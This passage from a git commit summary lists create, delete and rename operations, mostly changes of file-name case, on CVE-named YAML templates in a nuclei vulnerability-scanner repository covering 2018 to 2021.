nuclei-templates/CVE-2018/CVE-2018-12613.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-1271.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-13379.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-13980.yaml rename nuclei-templates/CVE-2018/{cve-2018-14064.yaml => CVE-2018-14064.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-14574.yaml => CVE-2018-14574.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-14916.yaml rename nuclei-templates/CVE-2018/{cve-2018-14918.yaml => CVE-2018-14918.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-15473.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-15657.yaml rename nuclei-templates/CVE-2018/{cve-2018-15745.yaml => CVE-2018-15745.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-15961.yaml => CVE-2018-15961.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16059.yaml => CVE-2018-16059.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16133.yaml => CVE-2018-16133.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16167.yaml => CVE-2018-16167.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16288.yaml => CVE-2018-16288.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16299.yaml => CVE-2018-16299.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-16341.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-16671.yaml rename nuclei-templates/CVE-2018/{cve-2018-17422.yaml => CVE-2018-17422.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18069.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18608.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18775.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18777.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18778.yaml rename nuclei-templates/CVE-2018/{cve-2018-18925.yaml => CVE-2018-18925.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19137.yaml rename 
nuclei-templates/CVE-2018/{cve-2018-19326.yaml => CVE-2018-19326.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19365.yaml rename nuclei-templates/CVE-2018/{cve-2018-19458.yaml => CVE-2018-19458.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19751.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19753.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19914.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-20009.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-20011.yaml rename nuclei-templates/CVE-2018/{cve-2018-2893.yaml => CVE-2018-2893.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-2894.yaml => CVE-2018-2894.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-5233.yaml => CVE-2018-5233.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-6200.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-6910.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7422.yaml rename nuclei-templates/CVE-2018/{cve-2018-7602.yaml => CVE-2018-7602.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-7662.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7700.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7719.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-8033.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-8719.yaml rename nuclei-templates/CVE-2018/{cve-2018-9118.yaml => CVE-2018-9118.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-1000226.yaml => cve-2018-1000226.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-1000856.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-1000861.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-10230.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-10956.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-11231.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-11776.yaml create mode 100644 
nuclei-templates/CVE-2018/cve-2018-11784.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-12300.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-12613.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-1271.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-13379.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-13980.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-14916.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-15473.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-15657.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-16341.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-16671.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18069.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18608.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18775.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18777.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18778.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19137.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19365.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19751.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19753.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19914.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-20009.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-20011.yaml rename nuclei-templates/CVE-2018/{CVE-2018-6008.yaml => cve-2018-6008.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-6200.yaml rename nuclei-templates/CVE-2018/{CVE-2018-6389.yaml => cve-2018-6389.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-6910.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-7422.yaml rename nuclei-templates/CVE-2018/{CVE-2018-7467.yaml => cve-2018-7467.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-7662.yaml create mode 100644 
nuclei-templates/CVE-2018/cve-2018-7700.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-7719.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-8033.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-8719.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-0221.yaml rename nuclei-templates/CVE-2019/{cve-2019-10232.yaml => CVE-2019-10232.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-10475.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-10717.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-10758.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-11013.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-11043.yaml rename nuclei-templates/CVE-2019/{cve-2019-11248.yaml => CVE-2019-11248.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-11370.yaml rename nuclei-templates/CVE-2019/{cve-2019-11580.yaml => CVE-2019-11580.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-12725.yaml => CVE-2019-12725.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-13392.yaml => CVE-2019-13392.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-13396.yaml rename nuclei-templates/CVE-2019/{cve-2019-13462.yaml => CVE-2019-13462.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-14223.yaml => CVE-2019-14223.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-14251.yaml rename nuclei-templates/CVE-2019/{cve-2019-14312.yaml => CVE-2019-14312.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-14470.yaml => CVE-2019-14470.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-14696.yaml rename nuclei-templates/CVE-2019/{cve-2019-14974.yaml => CVE-2019-14974.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-15107.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-15811.yaml rename nuclei-templates/CVE-2019/{cve-2019-16278.yaml => CVE-2019-16278.yaml} (100%) delete mode 100644 
nuclei-templates/CVE-2019/CVE-2019-1653.yaml rename nuclei-templates/CVE-2019/{cve-2019-16759.yaml => CVE-2019-16759.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-16932.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-16996.yaml rename nuclei-templates/CVE-2019/{cve-2019-17538.yaml => CVE-2019-17538.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-17558.yaml => CVE-2019-17558.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-18393.yaml => CVE-2019-18393.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-18665.yaml rename nuclei-templates/CVE-2019/{cve-2019-18818.yaml => CVE-2019-18818.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-19908.yaml => CVE-2019-19908.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-19985.yaml rename nuclei-templates/CVE-2019/{cve-2019-20085.yaml => CVE-2019-20085.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-20210.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-20354.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-20933.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-2616.yaml rename nuclei-templates/CVE-2019/{cve-2019-2767.yaml => CVE-2019-2767.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-3396.yaml => CVE-2019-3396.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-3799.yaml => CVE-2019-3799.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-3912.yaml rename nuclei-templates/CVE-2019/{cve-2019-7219.yaml => CVE-2019-7219.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7254.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7315.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7609.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-8442.yaml rename nuclei-templates/CVE-2019/{cve-2019-8449.yaml => CVE-2019-8449.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-8451.yaml rename 
nuclei-templates/CVE-2019/{cve-2019-8903.yaml => CVE-2019-8903.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-8937.yaml => CVE-2019-8937.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-8982.yaml => CVE-2019-8982.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-9041.yaml rename nuclei-templates/CVE-2019/{cve-2019-9726.yaml => CVE-2019-9726.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9915.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9922.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-0221.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-10475.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-10717.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-10758.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-11013.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-11043.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-11370.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-13396.yaml rename nuclei-templates/CVE-2019/{CVE-2019-14205.yaml => cve-2019-14205.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-14251.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-14696.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-15107.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-15811.yaml rename nuclei-templates/CVE-2019/{CVE-2019-15859.yaml => cve-2019-15859.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-16332.yaml => cve-2019-16332.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-1653.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-16932.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-16996.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-18665.yaml rename nuclei-templates/CVE-2019/{CVE-2019-19134.yaml => cve-2019-19134.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-19985.yaml delete mode 100644 
nuclei-templates/CVE-2019/cve-2019-20210.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-20354.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-20933.yaml rename nuclei-templates/CVE-2019/{CVE-2019-2588.yaml => cve-2019-2588.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-2616.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-3912.yaml rename nuclei-templates/CVE-2019/{CVE-2019-7192.yaml => cve-2019-7192.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-7238.yaml => cve-2019-7238.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-7254.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-7315.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-7609.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-8442.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-8451.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-9041.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9915.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9922.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-10220.yaml rename nuclei-templates/CVE-2020/{cve-2020-10549.yaml => CVE-2020-10549.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-1147.yaml => CVE-2020-1147.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-11529.yaml => CVE-2020-11529.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-11978.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-11991.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-12271.yaml rename nuclei-templates/CVE-2020/{cve-2020-12720.yaml => CVE-2020-12720.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-13117.yaml => CVE-2020-13117.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-13121.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-13945.yaml rename nuclei-templates/CVE-2020/{cve-2020-14750.yaml => CVE-2020-14750.yaml} (100%) rename 
nuclei-templates/CVE-2020/{cve-2020-14883.yaml => CVE-2020-14883.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15004.yaml => CVE-2020-15004.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15129.yaml => CVE-2020-15129.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-15227.yaml rename nuclei-templates/CVE-2020/{cve-2020-15500.yaml => CVE-2020-15500.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15505.yaml => CVE-2020-15505.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15568.yaml => CVE-2020-15568.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-16846.yaml rename nuclei-templates/CVE-2020/{cve-2020-16952.yaml => CVE-2020-16952.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-17518.yaml => CVE-2020-17518.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-17519.yaml => CVE-2020-17519.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-18268.yaml => CVE-2020-18268.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-1938.yaml => CVE-2020-1938.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-1943.yaml => CVE-2020-1943.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-2096.yaml rename nuclei-templates/CVE-2020/{cve-2020-2103.yaml => CVE-2020-2103.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-21224.yaml => CVE-2020-21224.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-2140.yaml => CVE-2020-2140.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-2199.yaml => CVE-2020-2199.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-22208.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-22210.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-22211.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-22840.yaml rename nuclei-templates/CVE-2020/{cve-2020-23015.yaml => CVE-2020-23015.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-23517.yaml delete mode 100644 
nuclei-templates/CVE-2020/CVE-2020-23575.yaml rename nuclei-templates/CVE-2020/{cve-2020-23972.yaml => CVE-2020-23972.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-24186.yaml rename nuclei-templates/CVE-2020/{cve-2020-24312.yaml => CVE-2020-24312.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-24550.yaml => CVE-2020-24550.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-24571.yaml => CVE-2020-24571.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-24765.yaml => CVE-2020-24765.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-24949.yaml => CVE-2020-24949.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-25223.yaml => CVE-2020-25223.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-25780.yaml => CVE-2020-25780.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-25864.yaml rename nuclei-templates/CVE-2020/{cve-2020-26413.yaml => CVE-2020-26413.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-27361.yaml rename nuclei-templates/CVE-2020/{cve-2020-28188.yaml => CVE-2020-28188.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-28208.yaml => CVE-2020-28208.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-28351.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-29597.yaml rename nuclei-templates/CVE-2020/{cve-2020-3187.yaml => CVE-2020-3187.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-35234.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35489.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-3580.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35847.yaml rename nuclei-templates/CVE-2020/{cve-2020-35951.yaml => CVE-2020-35951.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-36112.yaml rename nuclei-templates/CVE-2020/{cve-2020-36365.yaml => CVE-2020-36365.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-36510.yaml delete mode 100644 
nuclei-templates/CVE-2020/CVE-2020-4038.yaml rename nuclei-templates/CVE-2020/{cve-2020-4463.yaml => CVE-2020-4463.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-5284.yaml => CVE-2020-5284.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-5307.yaml => CVE-2020-5307.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-5410.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-5776.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-5777.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-6207.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-6287.yaml rename nuclei-templates/CVE-2020/{cve-2020-7136.yaml => CVE-2020-7136.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7209.yaml => CVE-2020-7209.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7246.yaml => CVE-2020-7246.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7961.yaml => CVE-2020-7961.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8115.yaml rename nuclei-templates/CVE-2020/{cve-2020-8163.yaml => CVE-2020-8163.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8191.yaml rename nuclei-templates/CVE-2020/{cve-2020-8209.yaml => CVE-2020-8209.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8512.yaml rename nuclei-templates/CVE-2020/{cve-2020-8771.yaml => CVE-2020-8771.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8813.yaml => CVE-2020-8813.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8982.yaml rename nuclei-templates/CVE-2020/{cve-2020-9036.yaml => CVE-2020-9036.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9376.yaml => CVE-2020-9376.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9402.yaml => CVE-2020-9402.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-10220.yaml rename nuclei-templates/CVE-2020/{CVE-2020-11455.yaml => cve-2020-11455.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-11546.yaml => 
cve-2020-11546.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-11978.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-11991.yaml rename nuclei-templates/CVE-2020/{CVE-2020-12054.yaml => cve-2020-12054.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-12271.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-13121.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-13945.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-16846.yaml rename nuclei-templates/CVE-2020/{CVE-2020-17362.yaml => cve-2020-17362.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-2096.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-22208.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-22210.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-22211.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-22840.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-23517.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-23575.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-24186.yaml rename nuclei-templates/CVE-2020/{CVE-2020-24391.yaml => cve-2020-24391.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-25864.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-27361.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-28351.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-29597.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-35234.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-35489.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-3580.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-35847.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-36112.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-36510.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-4038.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-5410.yaml create mode 100644 
nuclei-templates/CVE-2020/cve-2020-5776.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-5777.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-6207.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-6287.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-8115.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-8191.yaml rename nuclei-templates/CVE-2020/{CVE-2020-8497.yaml => cve-2020-8497.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-8512.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-8982.yaml rename nuclei-templates/CVE-2020/{CVE-2020-9054.yaml => cve-2020-9054.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-9757.yaml => cve-2020-9757.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-20200924a.yaml => cve-20200924a.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-1498.yaml => CVE-2021-1498.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-1499.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20031.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20090.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20091.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20092.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20792.yaml rename nuclei-templates/CVE-2021/{cve-2021-21234.yaml => CVE-2021-21234.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21745.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21799.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21801.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21802.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21805.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21973.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21985.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-22502.yaml rename nuclei-templates/CVE-2021/{cve-2021-24176.yaml => CVE-2021-24176.yaml} (100%) delete mode 
100644 nuclei-templates/CVE-2021/CVE-2021-24226.yaml rename nuclei-templates/CVE-2021/{cve-2021-24237.yaml => CVE-2021-24237.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24274.yaml => CVE-2021-24274.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24276.yaml rename nuclei-templates/CVE-2021/{cve-2021-24278.yaml => CVE-2021-24278.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24284.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24288.yaml rename nuclei-templates/CVE-2021/{cve-2021-24291.yaml => CVE-2021-24291.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24316.yaml rename nuclei-templates/CVE-2021/{cve-2021-24358.yaml => CVE-2021-24358.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24488.yaml rename nuclei-templates/CVE-2021/{cve-2021-24499.yaml => CVE-2021-24499.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24510.yaml rename nuclei-templates/CVE-2021/{cve-2021-24746.yaml => CVE-2021-24746.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24762.yaml => CVE-2021-24762.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24838.yaml => CVE-2021-24838.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24926.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25033.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25063.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25085.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25112.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25281.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25646.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-26247.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-26598.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-26855.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-27132.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-27519.yaml delete mode 
100644 nuclei-templates/CVE-2021/CVE-2021-27561.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-28149.yaml rename nuclei-templates/CVE-2021/{cve-2021-28150.yaml => CVE-2021-28150.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-28151.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-28164.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-28377.yaml rename nuclei-templates/CVE-2021/{cve-2021-28918.yaml => CVE-2021-28918.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-29203.yaml rename nuclei-templates/CVE-2021/{cve-2021-29441.yaml => CVE-2021-29441.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-29442.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-29484.yaml rename nuclei-templates/CVE-2021/{cve-2021-29622.yaml => CVE-2021-29622.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-29625.yaml => CVE-2021-29625.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-30049.yaml => CVE-2021-30049.yaml} (100%) rename 